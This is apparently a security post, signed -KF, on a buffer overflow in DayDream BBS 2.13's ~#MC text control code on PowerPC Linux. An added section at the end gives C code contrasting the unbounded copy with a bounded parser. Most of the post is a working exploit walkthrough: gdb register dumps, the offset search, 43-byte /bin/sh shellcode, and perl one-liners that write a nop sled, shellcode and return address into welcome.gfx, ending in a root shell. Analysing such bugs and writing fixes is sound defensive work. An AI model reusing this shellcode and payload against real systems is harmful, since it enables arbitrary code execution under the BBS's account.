Here is some information on a hole that was fixed in DayDream BBS's last revision.
There are a few entries in the DayDream BBS change log that I thought were worth mentioning:

2001-12-29  Hannu Lyytinen  <hlyytine@cs.uku.fi>

	* text file control codes ~#MC, ~#TF and ~#RA were vulnerable to
	buffer overflow attack. Although there are no known exploits, an
	attacker could run arbitrary code on whatever UID DayDream was
	running on.

2001-12-27  Hannu Lyytinen  <hlyytine@cs.uku.fi>

	* fixed buffer overflow bug in ~#MC command.

Now here is a little background about these issues...

/root/daydream-2.13/docshtml/setup.html:

  You can have the following control codes in your text files

  Action codes

  ~#MC[COMMAND]|        Menu command
  ~#TF[FILE]|           Show textfile
  ~#RA[FILE]|[max]|     Show random textfile. Format for file is
                        "/path/foobar%d.ext", where %d is a random
                        number (1-[max]).

Well, here's my first attempt to exploit this... looks UGLY. The stack was totally obliterated!@#@ I have never seen destruction like this to my PPC stack. *grin*

Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()
(gdb) bt
#0  0x41414140 in ?? ()
(gdb) i r
r0             0x41414141       1094795585
r1             0x7fffda90       2147474064
r2             0xd3fec000       -738279424
r3             0x1              1
r4             0x10053890       268777616
r5             0x100538a0       268777632
r6             0x10             16
r7             0x2              2
r8             0xff87d10        267943184
r9             0x10040000       268697600
r10            0xff87d10        267943184
r11            0x0              0
r12            0x2              2
r13            0x10047440       268727360
r14            0x0              0
r15            0x7ffff874       2147481716
r16            0x1              1
r17            0x10040000       268697600
r18            0x10040000       268697600
r19            0x10040000       268697600
r20            0x10040000       268697600
r21            0x10040000       268697600
r22            0x10040000       268697600
r23            0x41414141       1094795585
r24            0x41414141       1094795585
r25            0x41414141       1094795585
r26            0x41414141       1094795585
r27            0x41414141       1094795585
r28            0x41414141       1094795585
r29            0x41414141       1094795585
r30            0x41414141       1094795585
r31            0x41414141       1094795585
pc             0x41414140       1094795584
ps             0x8d032          577586
cr             0x28822828       679618600
lr             0x41414141       1094795585
ctr            0x0              0
xer            0x20000000       536870912

This was accomplished by the following...

[root@linuxppc bbs]# cat display/iso/welcome.gfx | more
~#MCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<9000 A's>|

The sweet spot is here...

[root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1596'`\|> display/iso/welcome.gfx

Ignore my username here... I was trying to mess with format issues, if any existed...

[root@linuxppc bbs]# ./daydream

DayDream BBS/Unix 2.13
Programming by Antti Häyrynen 1996-1997, DayDream Development Team 1998-2001

You are connected to node #10 at 57600 BPS.

    ˇ|  All accounts deleted - login  |ˇ
    :|            as NEW!             |:
   .:|                                |:.
 . ....:::|   NEW / CHAT / LOGOFF   |:::.... .
      `------------------------------'
Username: %p
Password: **
Segmentation fault (core dumped)

(gdb) bt
#0  0x0fece418 in free () from /lib/libc.so.6
#1  0x1001e3f0 in dotype (filename=0x58550 <Address 0x58550 out of bounds>, flags=35) at typetext.c:639
#2  0x1001d0c4 in find_and_type_file (name_comps=0x100537d0, flags=1094795585) at typetext.c:284
#3  0x1001d2ac in typefile (filename=0x7fffdbb0 "", flags=35) at typetext.c:348
#4  0x1001d3c8 in TypeFile (typethis=0x1002a2dc "welcome", flags=35) at typetext.c:380
#5  0x10009b48 in enterbbs () at enterbbs.c:102
#6  0x10003124 in getin () at daydream.c:401
#7  0x10002e9c in visit_bbs (m=0) at daydream.c:310
#8  0x10002b24 in visitbbs (m=0) at daydream.c:210
#9  0x10002a98 in main (argc=1, argv=0x7ffff864) at daydream.c:198
#10 0x0fe71b90 in __libc_start_main () from /lib/libc.so.6

Now we feed it some more to find the instruction pointer:

[root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1614'`\|> display/iso/welcome.gfx
[root@linuxppc bbs]# echo "~#MC"`perl -e 'print "A" x 1615'`Z\|> display/iso/welcome.gfx

Program received signal SIGILL, Illegal instruction.
0x41414158 in ?? ()

The saved return address therefore sits at offsets 1612-1615 of the argument (PowerPC fetches instructions on 4-byte boundaries, so the 'Z' (0x5a) shows up in pc as 0x58).

43 byte shellcode...

"\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70"
"\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68"

leaves 1572 bytes in the buffer, or 393 nops plus the need for one pad char (the payload below actually uses 392 four-byte nops: 392*4 + 43 + 1 pad byte = 1612 bytes, followed by the 4-byte return address). Here's our first try...

[root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x41\x41\x41\x41"'`\| > /home/bbs/display/iso/welcome.gfx

Our return is in $r1:

(gdb) x/10s $r1
0x7fffda90:      "/shAAAA"

Let's find the start of the nops:

(gdb) x/10s $r1-1615
0x7fffd441:      "˙Ú\220\020\001Ö´`iii`iii`iii`iii`iii`i

Here is perfect nop alignment:

(gdb) x/40x $r1-1608
0x7fffd448:      0x60696969

0x7fffd448 is where our code lies, so let's change the return address in our malicious string (0x7fffd4d8 lands 144 bytes into the nop sled):

[root@linuxppc root]# echo "~#MC"`perl -e 'print "\x60\x69\x69\x69" x 392'``perl -e 'print "\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x01\x2c\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x3b\xc0\x16\x01\x7f\xc0\x4e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68" x 1'`A`perl -e 'print "\x7f\xff\xd4\xd8"'`\| > /home/bbs/display/iso/welcome.gfx

    ˇ|  All accounts deleted - login  |ˇ
    :|            as NEW!             |:
   .:|                                |:.
 . ....:::|   NEW / CHAT / LOGOFF   |:::.... .
      `------------------------------'
Username: %p
Password: **
sh-2.05#

-KF
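As an added example (my own C, not DayDream's source or the original post's code), here is the shape of the bug the changelog describes next to a bounded version of the same control-code parser, plus the offset arithmetic behind the payload above. The argument limit ARG_MAX_LEN, the function names and the sample text are assumptions; DayDream's real buffer size is not given on the page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed argument limit for this example only. */
#define ARG_MAX_LEN 255

/* Shape of the bug the changelog describes (a reconstruction, not
 * DayDream's code): everything between the code and the '|' is copied
 * into the caller's fixed-size buffer with no length check, so a long
 * ~#MC argument walks straight over the saved registers and LR. */
int ctrl_arg_unbounded(const char *text, const char *code, char *out)
{
    const char *start = strstr(text, code);
    if (!start)
        return -1;
    start += strlen(code);
    size_t i = 0;
    while (start[i] != '\0' && start[i] != '|') {
        out[i] = start[i];          /* writes past 'out' on a long argument */
        i++;
    }
    out[i] = '\0';
    return (int)i;
}

/* Bounded version: the argument must be '|'-terminated and must fit,
 * otherwise nothing is copied and 'out' is left empty. Returns the
 * argument length, -1 if 'code' is absent, -2 if no terminator follows
 * it, -3 if the argument does not fit in outsz bytes (NUL included). */
int ctrl_arg(const char *text, const char *code, char *out, size_t outsz)
{
    if (outsz == 0)
        return -3;
    out[0] = '\0';
    const char *start = strstr(text, code);
    if (!start)
        return -1;
    start += strlen(code);
    const char *end = strchr(start, '|');
    if (!end)
        return -2;
    size_t len = (size_t)(end - start);
    if (len >= outsz)
        return -3;
    memcpy(out, start, len);
    out[len] = '\0';
    return (int)len;
}

/* Bounded parser on an ordinary menu command (constructed sample text).
 * Returns the parsed length, or -100 if the extracted text is wrong. */
int demo_normal(void)
{
    char buf[ARG_MAX_LEN + 1];
    int n = ctrl_arg("welcome text ~#MCDOORS| more text", "~#MC", buf, sizeof buf);
    if (n >= 0 && strcmp(buf, "DOORS") != 0)
        return -100;
    return n;
}

/* Bounded parser on the post's 1596-byte "sweet spot": the copy is
 * refused and the buffer stays empty instead of the stack being trashed.
 * Returns ctrl_arg's code, or -100 if anything was copied. */
int demo_overlong(void)
{
    char buf[ARG_MAX_LEN + 1];
    char line[4 + 1596 + 2];        /* "~#MC" + 1596 'A' + '|' + NUL */
    memcpy(line, "~#MC", 4);
    memset(line + 4, 'A', 1596);
    line[4 + 1596] = '|';
    line[4 + 1596 + 1] = '\0';
    int n = ctrl_arg(line, "~#MC", buf, sizeof buf);
    return buf[0] == '\0' ? n : -100;
}

/* Offset of the 4-byte return address in a payload laid out as the post's
 * perl one-liner does it: nops, shellcode, pad, then the address. */
size_t ret_addr_offset(size_t nops, size_t shellcode_len, size_t pad)
{
    return nops * 4 + shellcode_len + pad;
}

/* Why the 'Z' probe reported pc 0x41414158: PowerPC fetches on 4-byte
 * boundaries, so the low two bits of the return address are dropped. */
unsigned long ppc_fetch_addr(unsigned long lr)
{
    return lr & ~3UL;
}

int main(void)
{
    char small[64];
    printf("unbounded, short arg: %d\n", ctrl_arg_unbounded("~#MCDOORS|", "~#MC", small));
    printf("bounded, normal:      %d\n", demo_normal());
    printf("bounded, 1596 bytes:  %d\n", demo_overlong());
    printf("return addr at offset %zu\n", ret_addr_offset(392, 43, 1));
    printf("'Z' probe fetches pc 0x%lx\n", ppc_fetch_addr(0x4141415aUL));
    return 0;
}
```

The bounded parser refuses rather than truncates: silently cutting a menu command or file name short would turn an overflow into a different bug (running or displaying the wrong thing), so an argument that does not fit is an error. The offset function reproduces the post's layout: 392 nops, 43 bytes of shellcode and one pad byte put the return address at 1612, exactly where the 1615-A's-plus-'Z' probe showed the saved LR.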